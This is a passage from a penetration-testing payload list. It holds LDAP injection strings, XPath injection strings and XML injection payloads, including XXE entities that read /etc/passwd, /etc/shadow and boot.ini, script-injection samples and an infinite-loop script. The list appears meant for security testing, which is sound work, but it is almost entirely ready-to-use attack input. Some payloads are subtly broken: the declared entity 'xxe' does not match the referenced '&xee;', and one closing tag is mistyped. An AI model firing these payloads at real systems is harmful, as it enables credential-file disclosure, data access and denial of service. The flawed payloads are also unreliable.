%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
*()|%26'
admin*
admin*)((|userPassword=*)
*)(uid=*))(|(uid=*
XPATH Injection
For details on XPATH Injection: Testing for XPath Injection
'+or+'1'='1
'+or+''='
x'+or+1=1+or+'x'='y
/
//
//*
*/*
@*
count(/child::node())
x'+or+name()='username'+or+'x'='y
XML Injection
Details on XML Injection here: Testing for XML Injection
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>